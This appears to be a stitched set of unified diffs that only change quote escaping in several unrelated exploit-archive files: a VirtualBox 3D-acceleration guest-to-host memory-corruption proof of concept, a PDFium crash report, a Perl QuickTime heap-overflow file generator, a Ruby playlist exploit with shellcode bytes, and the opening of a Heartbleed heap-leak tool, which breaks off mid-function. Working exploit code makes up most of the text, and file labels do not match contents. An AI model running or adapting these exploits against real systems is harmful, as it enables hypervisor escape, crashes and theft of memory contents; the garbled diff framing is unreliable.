\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\'
|
||||
'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py'
|
||||
Python script:
|
||||
|
||||
|
||||
|
@ -324,15 +324,15 @@ crServerDispatchVertexAttrib4sARB
|
|||
|
||||
|
||||
/-----
|
||||
#include \"stdafx.h\"
|
||||
#include "stdafx.h"
|
||||
#include <windows.h>
|
||||
#include \"vboxguest2.h\"
|
||||
#include \"vboxguest.h\"
|
||||
#include \"err.h\"
|
||||
#include \"vboxcropenglsvc.h\"
|
||||
#include \"cr_protocol.h\"
|
||||
#include "vboxguest2.h"
|
||||
#include "vboxguest.h"
|
||||
#include "err.h"
|
||||
#include "vboxcropenglsvc.h"
|
||||
#include "cr_protocol.h"
|
||||
|
||||
#define VBOXGUEST_DEVICE_NAME \"\\\\\\\\.\\\\VBoxGuest\"
|
||||
#define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest"
|
||||
|
||||
|
||||
HANDLE open_device(){
|
||||
|
@ -345,10 +345,10 @@ HANDLE open_device(){
|
|||
NULL);
|
||||
|
||||
if (hDevice == INVALID_HANDLE_VALUE){
|
||||
printf(\"[-] Could not open device %s .\\n\", VBOXGUEST_DEVICE_NAME);
|
||||
printf("[-] Could not open device %s .\n", VBOXGUEST_DEVICE_NAME);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
printf(\"[+] Handle to %s: 0x%X\\n\", VBOXGUEST_DEVICE_NAME, hDevice);
|
||||
printf("[+] Handle to %s: 0x%X\n", VBOXGUEST_DEVICE_NAME, hDevice);
|
||||
return hDevice;
|
||||
|
||||
|
||||
|
@ -362,24 +362,24 @@ uint32_t do_connect(HANDLE hDevice){
|
|||
|
||||
memset(&info, 0, sizeof(info));
|
||||
info.Loc.type = VMMDevHGCMLoc_LocalHost_Existing;
|
||||
strcpy(info.Loc.u.host.achName, \"VBoxSharedCrOpenGL\");
|
||||
strcpy(info.Loc.u.host.achName, "VBoxSharedCrOpenGL");
|
||||
|
||||
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CONNECT, &info,
|
||||
sizeof(info), &info, sizeof(info), &cbReturned, NULL);
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function do_connect()!
|
||||
LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function do_connect()!
|
||||
LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (info.result == VINF_SUCCESS){
|
||||
printf(\"HGCM connect was successful: client id =0x%x\\n\",
|
||||
printf("HGCM connect was successful: client id =0x%x\n",
|
||||
info.u32ClientID);
|
||||
}
|
||||
else{
|
||||
//If 3D Acceleration is disabled, info.result value will be -2900.
|
||||
printf(\"[-] HGCM connect failed. Result: %d (Is 3D Acceleration
|
||||
enabled??)\\n\", info.result);
|
||||
printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration
|
||||
enabled??)\n", info.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
return info.u32ClientID;
|
||||
|
@ -393,20 +393,20 @@ void do_disconnect(HANDLE hDevice, uint32_t u32ClientID){
|
|||
|
||||
memset(&info, 0, sizeof(info));
|
||||
info.u32ClientID = u32ClientID;
|
||||
printf(\"Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\\n\");
|
||||
printf("Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\n");
|
||||
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_DISCONNECT,
|
||||
&info, sizeof(info), &info, sizeof(info), &cbReturned, NULL);
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
do_disconnect()! LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
do_disconnect()! LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (info.result == VINF_SUCCESS){
|
||||
printf(\"HGCM disconnect was successful.\\n\");
|
||||
printf("HGCM disconnect was successful.\n");
|
||||
}
|
||||
else{
|
||||
printf(\"[-] HGCM disconnect failed. Result: %d\\n\", info.result);
|
||||
printf("[-] HGCM disconnect failed. Result: %d\n", info.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -433,16 +433,16 @@ void set_version(HANDLE hDevice, uint32_t u32ClientID){
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function set_version()!
|
||||
LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function set_version()!
|
||||
LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"Host didn\'t accept our version.\\n\");
|
||||
printf("Host didn't accept our version.\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
@ -466,16 +466,16 @@ void set_pid(HANDLE hDevice, uint32_t u32ClientID){
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function set_pid()!
|
||||
LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function set_pid()!
|
||||
LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"Host didn\'t like our PID %d\\n\", GetCurrentProcessId());
|
||||
printf("Host didn't like our PID %d\n", GetCurrentProcessId());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -501,7 +501,7 @@ void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){
|
|||
*((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999;
|
||||
|
||||
memcpy(&mybuf, &msg, sizeof(msg));
|
||||
strcpy(mybuf + sizeof(msg), \"Hi hypervisor!\");
|
||||
strcpy(mybuf + sizeof(msg), "Hi hypervisor!");
|
||||
|
||||
memset(&parms, 0, sizeof(parms));
|
||||
parms.hdr.result = VERR_WRONG_ORDER;
|
||||
|
@ -521,16 +521,16 @@ memcpy: sizeof(mybuf) - 0x18
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
trigger_message_readback()!. LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
trigger_message_readback()!. LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
|
||||
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
@ -553,7 +553,7 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){
|
|||
*((DWORD *)msg.writeback.writeback_ptr.ptrSize) = 0xAABBCCDD;
|
||||
|
||||
memcpy(&mybuf, &msg, sizeof(msg));
|
||||
strcpy(mybuf + sizeof(msg), \"dummy\");
|
||||
strcpy(mybuf + sizeof(msg), "dummy");
|
||||
|
||||
memset(&parms, 0, sizeof(parms));
|
||||
parms.hdr.result = VERR_WRONG_ORDER;
|
||||
|
@ -573,16 +573,16 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
trigger_message_writeback()! LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
trigger_message_writeback()! LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
|
||||
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -646,16 +646,16 @@ negative index used to trigger the memory corruption
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
trigger_opcode_0xea()! LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
trigger_opcode_0xea()! LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
|
||||
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -676,19 +676,19 @@ void poc(int option){
|
|||
|
||||
switch (option){
|
||||
case 1:
|
||||
printf(\"[1] triggering the first bug...\\n\");
|
||||
printf("[1] triggering the first bug...\n");
|
||||
trigger_message_readback(hDevice, u32ClientID);
|
||||
break;
|
||||
case 2:
|
||||
printf(\"[2] triggering the second bug...\\n\");
|
||||
printf("[2] triggering the second bug...\n");
|
||||
trigger_message_writeback(hDevice, u32ClientID);
|
||||
break;
|
||||
case 3:
|
||||
printf(\"[3] triggering the third bug...\\n\");
|
||||
printf("[3] triggering the third bug...\n");
|
||||
trigger_opcode_0xea(hDevice, u32ClientID);
|
||||
break;
|
||||
default:
|
||||
printf(\"[!] Unknown option %d.\\n\", option);
|
||||
printf("[!] Unknown option %d.\n", option);
|
||||
}
|
||||
|
||||
/* Disconnect from the VBoxSharedCrOpenGL service */
|
||||
|
@ -702,13 +702,13 @@ void poc(int option){
|
|||
int main(int argc, char* argv[])
|
||||
{
|
||||
if (argc < 2){
|
||||
printf(\"Usage: %s <option number>\\n\\n\", argv[0]);
|
||||
printf(\"* Option 1: trigger the vulnerability in the
|
||||
crNetRecvReadback function.\\n\");
|
||||
printf(\"* Option 2: trigger the vulnerability in the
|
||||
crNetRecvWriteback function.\\n\");
|
||||
printf(\"* Option 3: trigger the vulnerability in the
|
||||
crServerDispatchVertexAttrib4NubARB function.\\n\");
|
||||
printf("Usage: %s <option number>\n\n", argv[0]);
|
||||
printf("* Option 1: trigger the vulnerability in the
|
||||
crNetRecvReadback function.\n");
|
||||
printf("* Option 2: trigger the vulnerability in the
|
||||
crNetRecvWriteback function.\n");
|
||||
printf("* Option 3: trigger the vulnerability in the
|
||||
crServerDispatchVertexAttrib4NubARB function.\n");
|
||||
exit(1);
|
||||
}
|
||||
poc(atoi(argv[1]));
|
||||
|
@ -816,8 +816,8 @@ effectively secure their organizations.
|
|||
|
||||
|
||||
|
||||
Core Security\'s software solutions build on over a decade of trusted
|
||||
research and leading-edge threat expertise from the company\'s Security
|
||||
Core Security's software solutions build on over a decade of trusted
|
||||
research and leading-edge threat expertise from the company's Security
|
||||
Consulting Services, CoreLabs and Engineering groups. Core Security
|
||||
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
|
||||
http://www.coresecurity.com.
|
||||
|
|
|
@ -33,8 +33,8 @@ Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
|
|||
#0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795
|
||||
|
||||
This frame has 2 object(s):
|
||||
[32, 36) \'input\' <== Memory access at offset 36 overflows this variable
|
||||
[48, 52) \'nresults\'
|
||||
[32, 36) 'input' <== Memory access at offset 36 overflows this variable
|
||||
[48, 52) 'nresults'
|
||||
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
|
||||
(longjmp and C++ exceptions *are* supported)
|
||||
SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
|
||||
|
@ -74,7 +74,7 @@ Shadow byte legend (one shadow byte represents 8 application bytes):
|
|||
==22207==ABORTING
|
||||
--- cut ---
|
||||
|
||||
While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds \"write\" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
|
||||
While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
|
||||
|
||||
The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.
|
||||
|
||||
|
|
|
@ -3,35 +3,35 @@
|
|||
# Vendor: http://www.apple.com/
|
||||
# Risk : high
|
||||
#
|
||||
# The \"<? quicktime type= ?>\" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
|
||||
# The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
|
||||
# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
|
||||
# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
|
||||
# remote crash on firefox, IE and any browser using the Quicktime plugin.
|
||||
# Code execution may be possible.
|
||||
my $payload =
|
||||
\"\\x3c\\x3f\\x78\\x6d\\x6c\\x20\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x3d\\x22\\x31\\x2e\\x30\\x22\\x3f\".
|
||||
\"\\x3e\\x0d\\x0a\\x3c\\x3f\\x71\\x75\\x69\\x63\\x6b\\x74\\x69\\x6d\\x65\\x20\\x74\\x79\\x70\\x65\\x3d\".
|
||||
\"\\x22\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\\x2d\\x71\\x75\\x69\\x63\\x6b\".
|
||||
\"\\x74\\x69\\x6d\\x65\\x2d\\x6d\\x65\\x64\\x69\\x61\\x2d\\x6c\\x69\\x6e\\x6b\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x22\\x3f\\x3e\".
|
||||
\"\\x0d\\x0a\\x3c\\x65\\x6d\\x62\\x65\\x64\\x20\\x73\\x72\\x63\\x3d\\x22\\x72\\x74\\x73\\x70\\x3a\\x2f\".
|
||||
\"\\x2f\\x6e\\x6f\\x73\\x69\\x74\\x65\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x6f\\x76\\x69\\x64\\x7a\\x2e\\x6d\".
|
||||
\"\\x6f\\x76\\x22\\x20\\x61\\x75\\x74\\x6f\\x70\\x6c\\x61\\x79\\x3d\\x22\\x77\\x68\\x61\\x74\\x65\\x76\".
|
||||
\"\\x65\\x72\\x22\\x20\\x2f\\x3e\\x00\";
|
||||
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f".
|
||||
"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d".
|
||||
"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b".
|
||||
"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e".
|
||||
"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f".
|
||||
"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d".
|
||||
"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76".
|
||||
"\x65\x72\x22\x20\x2f\x3e\x00";
|
||||
|
||||
my $file=\"crash.mov\";
|
||||
open(my $file, \">>$file\") or die \"Cannot open $file: $!\";
|
||||
my $file="crash.mov";
|
||||
open(my $file, ">>$file") or die "Cannot open $file: $!";
|
||||
print $file $payload;
|
||||
close($file);
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Sun\\\'s VirtualBox host reboot PoC
|
||||
Sun's VirtualBox host reboot PoC
|
||||
by Tadas Vilkeliskis <vilkeliskis.t@gmail.com>
|
||||
Disclosure made at 2009-08-01
|
||||
|
||||
|
|
|
@ -18,43 +18,43 @@ JMP_EAX = 0x8fe24459
|
|||
|
||||
def make_exec_payload_from_heap_stub()
|
||||
frag0 =
|
||||
\\\"\\\\x90\\\" + # nop
|
||||
\\\"\\\\x58\\\" + # pop eax
|
||||
\\\"\\\\x61\\\" + # popa
|
||||
\\\"\\\\xc3\\\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x61" + # popa
|
||||
"\xc3" # ret
|
||||
frag1 =
|
||||
\\\"\\\\x90\\\" + # nop
|
||||
\\\"\\\\x58\\\" + # pop eax
|
||||
\\\"\\\\x89\\\\xe0\\\" + # mov eax, esp
|
||||
\\\"\\\\x83\\\\xc0\\\\x0c\\\" + # add eax, byte +0xc
|
||||
\\\"\\\\x89\\\\x44\\\\x24\\\\x08\\\" + # mov [esp+0x8], eax
|
||||
\\\"\\\\xc3\\\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x89\xe0" + # mov eax, esp
|
||||
"\x83\xc0\x0c" + # add eax, byte +0xc
|
||||
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
|
||||
"\xc3" # ret
|
||||
exec_payload_from_heap_stub =
|
||||
frag0 +
|
||||
[SETJMP, JMP_BUF + 32, JMP_BUF].pack(\\\"V3\\\") +
|
||||
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
|
||||
frag1 +
|
||||
\\\"X\\\" * 20 +
|
||||
"X" * 20 +
|
||||
[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
|
||||
JMP_EAX].pack(\\\"V5\\\") +
|
||||
\\\"X\\\" * 4
|
||||
JMP_EAX].pack("V5") +
|
||||
"X" * 4
|
||||
end
|
||||
|
||||
payload_cmd = \\\"hereisthetrick\\\"
|
||||
payload_cmd = "hereisthetrick"
|
||||
stub = make_exec_payload_from_heap_stub()
|
||||
ext = \\\"A\\\" * 59
|
||||
ext = "A" * 59
|
||||
stub = make_exec_payload_from_heap_stub()
|
||||
exploit = ext + stub + payload_cmd
|
||||
|
||||
# pls file format
|
||||
|
||||
file = \\\"[playlist]\\\\n\\\"
|
||||
file += \\\"NumberOfEntries=1\\\\n\\\"
|
||||
file += \\\"File1=http://1/asdf.\\\" + exploit + \\\"\\\\n\\\"
|
||||
file += \\\"Title1=asdf\\\\n\\\"
|
||||
file += \\\"Length1=100\\\\n\\\"
|
||||
file += \\\"Version=2\\\" + \\\'\\\\n\\\'
|
||||
file = "[playlist]\n"
|
||||
file += "NumberOfEntries=1\n"
|
||||
file += "File1=http://1/asdf." + exploit + "\n"
|
||||
file += "Title1=asdf\n"
|
||||
file += "Length1=100\n"
|
||||
file += "Version=2" + '\n'
|
||||
|
||||
File.open(\\\'poc.pls\\\',\\\'w\\\') do |f|
|
||||
File.open('poc.pls','w') do |f|
|
||||
f.puts file
|
||||
f.close
|
||||
end
|
||||
|
|
|
@ -16,7 +16,7 @@
|
|||
* and can be run in a loop until the connected peer ends connection.
|
||||
* The data leaked contains 16 bytes of random padding at the end.
|
||||
* The exploit can be used against a connecting client or server,
|
||||
* it can also send pre_cmd\\\'s to plain-text services to establish
|
||||
* it can also send pre_cmd's to plain-text services to establish
|
||||
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
|
||||
* will often forcefully close the connection during large leak
|
||||
* requests so try to lower your payload request size.
|
||||
|
@ -35,23 +35,23 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=65535
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16381 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16381 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=42
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=18
|
||||
* [ wrote 18 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 18 bytes of heap to file 'out'
|
||||
* [ done.
|
||||
* $ ls -al out
|
||||
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
|
||||
|
@ -60,11 +60,11 @@
|
|||
*
|
||||
* Use following example command to generate certificates for clients.
|
||||
*
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\\
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
|
||||
* -keyout server.key -out server.crt
|
||||
*
|
||||
* Debian compile with \\\"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\\
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\\\"
|
||||
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
|
||||
*
|
||||
* todo: add udp/dtls support.
|
||||
*
|
||||
|
@ -93,9 +93,9 @@
|
|||
#include <openssl/rand.h>
|
||||
#include <openssl/buffer.h>
|
||||
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\\
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
|
||||
(((unsigned int)(c[1])) )),c+=2)
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\\
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
|
||||
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
|
||||
|
||||
int first = 0;
|
||||
|
@ -135,20 +135,20 @@ int tcp_connect(char* server,int port){
|
|||
host = gethostbyname(server);
|
||||
sd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
bzero(&(sa.sin_zero),8);
|
||||
printf(\\\"[ connecting to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connecting to %s %d/tcp\n",server,port);
|
||||
ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
|
||||
if(ret==0){
|
||||
printf(\\\"[ connected to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connected to %s %d/tcp\n",server,port);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[!] FATAL: could not connect to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
|
||||
exit(0);
|
||||
}
|
||||
return sd;
|
||||
|
@ -161,7 +161,7 @@ int tcp_bind(char* server, int port){
|
|||
host = gethostbyname(server);
|
||||
sd=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(&sin,0,sizeof(sin));
|
||||
|
@ -171,7 +171,7 @@ int tcp_bind(char* server, int port){
|
|||
setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
|
||||
ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
|
||||
if(ret==-1){
|
||||
printf(\\\"[!] cannot bind socket\\\\n\\\");
|
||||
printf("[!] cannot bind socket\n");
|
||||
exit(0);
|
||||
}
|
||||
listen(sd,5);
|
||||
|
@ -191,7 +191,7 @@ connection* tls_connect(int sd){
|
|||
connection *c;
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
